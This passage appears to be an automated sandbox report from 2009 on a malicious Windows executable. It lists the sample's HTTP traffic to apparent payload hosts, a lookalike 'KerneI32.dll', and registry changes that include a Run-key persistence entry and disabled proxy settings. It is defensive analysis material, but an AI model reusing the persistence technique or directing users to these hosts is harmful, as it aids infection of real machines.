6f66 742d 4949 532f 362e 300d 0a58 2d50    oft-IIS/6.0..X-P
6f77 6572 6564 2d42 793a 2050 6c65 736b    owered-By: Plesk
5769 6e0d 0a58 2d50 6f77 6572 6564 2d42    Win..X-Powered-B
793a 2041 5350 2e4e 4554 0d0a 4461 7465    y: ASP.NET..Date
3a20 4672 692c 2032 3020 4d61 7220 3230    : Fri, 20 Mar 20
3039 2031 313a 3032 3a32 3320 474d 540d    09 11:02:23 GMT.
0a0d 0a68 7474 703a 2f2f 7777 772e 6c61    ...http://www.la
6465 7337 372e 636f 6d2f 696d 6167 6573    des77.com/images
2f6a 732f 7961 2e74 7874                   /js/ya.txt

from ANUBIS:1095 to 78.111.96.8:80

State: Connection established, not terminated - Transferred outbound Bytes: 242 - Transferred inbound Bytes: 238

Data sent:

    
4745 5420 2f69 6d67 2f6a 7067 2f6d 6f6c    GET /img/jpg/mol
612e 696e 6620 4854 5450 2f31 2e31 0d0a    a.inf HTTP/1.1..
4163 6365 7074 3a20 7465 7874 2f68 746d    Accept: text/htm
6c2c 202a 2f2a 0d0a 4966 2d4d 6f64 6966    l, */*..If-Modif
6965 642d 5369 6e63 653a 2053 756e 2c20    ied-Since: Sun, 
3131 204a 616e 2032 3030 3920 3035 3a31    11 Jan 2009 05:1
383a 3331 2047 4d54 0d0a 4966 2d4e 6f6e    8:31 GMT..If-Non
652d 4d61 7463 683a 2022 3361 6362 3237    e-Match: "3acb27
6261 6337 3363 3931 3a61 6439 6663 220d    bac73c91:ad9fc".
0a55 7365 722d 4167 656e 743a 2061 6348    .User-Agent: acH
5454 5020 636f 6d70 6f6e 656e 7420 2841    TTP component (A
7070 436f 6e74 726f 6c73 2e63 6f6d 290d    ppControls.com).
0a48 6f73 743a 2077 7777 2e74 7572 6b6f    .Host: www.turko
6e7a 2e63 6f6d 0d0a 436f 6e6e 6563 7469    nz.com..Connecti
6f6e 3a20 4b65 6570 2d41 6c69 7665 0d0a    on: Keep-Alive..
0d0a                                       ..

Data received:

    
4854 5450 2f31 2e31 2033 3034 204e 6f74    HTTP/1.1 304 Not
204d 6f64 6966 6965 640d 0a4c 6173 742d     Modified..Last-
4d6f 6469 6669 6564 3a20 5375 6e2c 2031    Modified: Sun, 1
3120 4a61 6e20 3230 3039 2030 353a 3138    1 Jan 2009 05:18
3a33 3120 474d 540d 0a41 6363 6570 742d    :31 GMT..Accept-
5261 6e67 6573 3a20 6279 7465 730d 0a45    Ranges: bytes..E
5461 673a 2022 3361 6362 3237 6261 6337    Tag: "3acb27bac7
3363 3931 3a61 6439 6663 220d 0a53 6572    3c91:ad9fc"..Ser
7665 723a 204d 6963 726f 736f 6674 2d49    ver: Microsoft-I
4953 2f36 2e30 0d0a 582d 506f 7765 7265    IS/6.0..X-Powere
642d 4279 3a20 506c 6573 6b57 696e 0d0a    d-By: PleskWin..
582d 506f 7765 7265 642d 4279 3a20 4153    X-Powered-By: AS
502e 4e45 540d 0a44 6174 653a 2046 7269    P.NET..Date: Fri
2c20 3230 204d 6172 2032 3030 3920 3131    , 20 Mar 2009 11
3a30 323a 3531 2047 4d54 0d0a 0d0a         :02:51 GMT....

	- TCP Connection Attempts:

from ANUBIS:1067 to 66.147.242.99:80

from ANUBIS:1090 to 78.111.96.8:80

from ANUBIS:1073 to 66.147.242.99:80

from ANUBIS:1085 to 66.147.242.99:80

from ANUBIS:1086 to 78.111.96.8:80

from ANUBIS:1077 to 66.147.242.99:80

from ANUBIS:1083 to 66.147.242.99:80

from ANUBIS:1080 to 78.111.96.8:80

from ANUBIS:1088 to 78.111.96.8:80

from ANUBIS:1089 to 66.147.242.99:80

from ANUBIS:1076 to 78.111.96.8:80

from ANUBIS:1071 to 66.147.242.99:80

from ANUBIS:1074 to 78.111.96.8:80

from ANUBIS:1069 to 66.147.242.99:80

from ANUBIS:1078 to 78.111.96.8:80

from ANUBIS:1087 to 66.147.242.99:80

from ANUBIS:1091 to 66.147.242.99:80

from ANUBIS:1092 to 78.111.96.8:80

from ANUBIS:1072 to 78.111.96.8:80

from ANUBIS:1079 to 66.147.242.99:80

from ANUBIS:1082 to 78.111.96.8:80

from ANUBIS:1081 to 66.147.242.99:80

from ANUBIS:1075 to 66.147.242.99:80

from ANUBIS:1093 to 66.147.242.99:80

from ANUBIS:1084 to 78.111.96.8:80

from ANUBIS:1070 to 78.111.96.8:80

from ANUBIS:1068 to 78.111.96.8:80

2. sample.exe

	- General information about this executable

Analysis Reason:	Primary Analysis Subject
Filename:	sample.exe
MD5:	6e49d9550a4b1f30940373162457b888
SHA-1:	2d1446a8ecb6e36c9e43750585575fa2ab72eb53
File Size:	504832 Bytes
Command Line:	"C:\sample.exe"
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\advapi32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\mpr.dll	0x71B20000	0x00012000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\oleaut32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\shell32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\version.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\wininet.dll	0x42C10000	0x000CF000
C:\WINDOWS\system32\Normaliz.dll	0x00330000	0x00009000
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\winmm.dll	0x76B40000	0x0002D000
C:\WINDOWS\system32\wsock32.dll	0x71AD0000	0x00009000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\URIMON.dll	0x00F90000	0x0000B000
C:\WINDOWS\system32\KerneI32.dll	0x00FB0000	0x0000E000
C:\WINDOWS\system32\urlmon.dll	0x42CF0000	0x00127000
C:\WINDOWS\system32\uxtheme.dll	0x5AD70000	0x00038000
C:\WINDOWS\system32\NETAPI32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\olepro32.dll	0x5EDD0000	0x00017000
C:\WINDOWS\system32\hnetcfg.dll	0x662B0000	0x00058000
C:\WINDOWS\System32\mswsock.dll	0x71A50000	0x0003F000
C:\WINDOWS\System32\wshtcpip.dll	0x71A90000	0x00008000
C:\WINDOWS\system32\sensapi.dll	0x722B0000	0x00005000
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\msctfime.ime	0x755C0000	0x0002E000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\iphlpapi.dll	0x76D60000	0x00019000
C:\WINDOWS\system32\rtutils.dll	0x76E80000	0x0000E000
C:\WINDOWS\system32\rasman.dll	0x76E90000	0x00012000
C:\WINDOWS\system32\TAPI32.dll	0x76EB0000	0x0002F000
C:\WINDOWS\system32\RASAPI32.dll	0x76EE0000	0x0003C000
C:\WINDOWS\system32\DNSAPI.dll	0x76F20000	0x00027000
C:\WINDOWS\system32\WLDAP32.dll	0x76F60000	0x0002C000
C:\WINDOWS\System32\winrnr.dll	0x76FB0000	0x00008000
C:\WINDOWS\system32\rasadhlp.dll	0x76FC0000	0x00006000
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000
C:\WINDOWS\system32\msv1_0.dll	0x77C70000	0x00024000

2.a) sample.exe - Registry Activities

	- Registry Values Modified:

Key	Name	New Value
HKLM\SYSTEM\CURRENTCONTROLSET\HARDWARE PROFILES\CURRENT\Software\Microsoft\windows\CurrentVersion\Internet Settings	ProxyEnable	0
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Common AppData	C:\Documents and Settings\All Users\Application Data
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	System Service Starter	C:\WINDOWS\srchasst\winlogon.exe
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	AppData	C:\Documents and Settings\user\Application Data
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cookies	C:\Documents and Settings\user\Cookies
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	History	C:\Documents and Settings\user\Local Settings\History
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	AutoDetect	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	IntranetName	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ProxyBypass	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	UNCAsIntranet	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings	MigrateProxy	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings	ProxyEnable	0
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	SavedLegacySettings	0x460000006800000001000000000000000000000000000000040000000000

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EnablePunycode	1	1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	UrlEncoding	0x00000000	2
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters	Transports	0x5400630070006900700000004e0065007400420049004f00530000000000	2
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	1
HKLM\Software\Microsoft\CTF\SystemShared	CUAS	0	1
HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BEHAVIORS	*	1	1
HKLM\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_MK_PROTOCOL	*	1	1
HKLM\Software\Microsoft\Rpc\SecurityService	10	secur32.dll	1
HKLM\Software\Microsoft\Tracing	EnableConsoleTracing	0	1
HKLM\Software\Microsoft\Tracing\RASAPI32	ConsoleTracingMask	4294901760	2
HKLM\Software\Microsoft\Tracing\RASAPI32	EnableConsoleTracing	0	2
HKLM\Software\Microsoft\Tracing\RASAPI32	EnableFileTracing	0	2
HKLM\Software\Microsoft\Tracing\RASAPI32	FileDirectory	%windir%\tracing	4
HKLM\Software\Microsoft\Tracing\RASAPI32	FileTracingMask	4294901760	2
HKLM\Software\Microsoft\Tracing\RASAPI32	MaxFileSize	1048576	2
HKLM\Software\Microsoft\Windows NT\CurrentVersion\IMM	Ime File	msctfime.ime	1
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList	AllUsersProfile	All Users	5
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList	DefaultUserProfile	Default User	5
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList	ProfilesDirectory	%SystemDrive%\Documents and Settings	10
HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1229272821-1004336348-527237240-1003	ProfileImagePath	%SystemDrive%\Documents and Settings\user	5
HKLM\Software\Microsoft\Windows\CurrentVersion	CommonFilesDir	C:\Program Files\Common Files	5
HKLM\Software\Microsoft\Windows\CurrentVersion	ProgramFilesDir	C:\Program Files	5
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders	Common AppData	%ALLUSERSPROFILE%\Application Data	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content	PerUserItem	1	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies	PerUserItem	1	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History	PerUserItem	1	1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\\msn.com			1
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\\msn.com\related	http	4	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	7
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Capabilities	16464	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Comment	Digest SSPI Authentication Package	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Name	Digest	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	RpcId	65535	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	TokenSize	65535	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Type	49	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\digest.dll	Version	1	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Capabilities	55	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Comment	DPA Security Package	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Name	DPA	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	RpcId	17	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	TokenSize	768	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Type	49	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msapsspc.dll	Version	1	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Capabilities	55	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Comment	MSN Security Package	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Name	MSN	2
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	RpcId	18	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	TokenSize	768	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Type	49	1
HKLM\System\CurrentControlSet\Control\Lsa\SspiCache\msnsspc.dll	Version	1	1
HKLM\System\CurrentControlSet\Control\ProductOptions	ProductType	WinNT	1
HKLM\System\CurrentControlSet\Control\SecurityProviders	SecurityProviders	msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll	2
HKLM\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles	GSSAPI	Kerberos	1
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	ComSpec	%SystemRoot%\system32\cmd.exe	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	FP_NO_HOST_CHECK	NO	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	NUMBER_OF_PROCESSORS	1	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	OS	Windows_NT	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PATHEXT	.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_ARCHITECTURE	x86	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_IDENTIFIER	x86 Family 6 Model 3 Stepping 3, GenuineIntel	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_LEVEL	6	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	PROCESSOR_REVISION	0303	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	Path	%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	TEMP	%SystemRoot%\TEMP	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	TMP	%SystemRoot%\TEMP	10
HKLM\System\CurrentControlSet\Control\Session Manager\Environment	windir	%SystemRoot%	10
HKLM\System\CurrentControlSet\Services\LDAP	LdapClientIntegrity	1	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Domain		2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Hostname	user	2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	UseDomainNameDevolution	1	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	HelperDllName	%SystemRoot%\System32\wshtcpip.dll	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	Mapping	0x0b0000000300000002000000010000000600000002000000010000000000	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MaxSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MinSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	UseDelayedAcceptance	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters	WinSock_Registry_Version	2.0	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Num_Catalog_Entries	3	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	DisplayString	Tcpip	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	ProviderId	0x409d05229e7ecf11ae5a00aa00a7112b	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	SupportedNameSpace	12	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	DisplayString	NTDS	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	LibraryPath	%SystemRoot%\System32\winrnr.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	ProviderId	0xee37263b80e5cf11a55500c04fd8d4ac	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	SupportedNameSpace	32	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	DisplayString	Network Location Awareness (NLA) Namespace	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	ProviderId	0x3a244266a83ba64abaa52e0bd71fdd83	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	SupportedNameSpace	15	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Next_Catalog_Entry_ID	1012	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Num_Catalog_Entries	11	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\Setup	SystemSetupInProgress	0	3
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Environment	TEMP	%USERPROFILE%\Local Settings\Temp	10
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Environment	TMP	%USERPROFILE%\Local Settings\Temp	10
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS	EnableHttp1_1	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS	EnableNegotiate	1	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS	MimeExclusionListForCache	multipart/mixed multipart/x-mixed-replace multipart/x-byteranges	4
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS	SecureProtocols	160	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS	WarnOnPost	0x01000000	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS	WarnOnZoneCrossing	0	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	CertificateRevocation	0	1
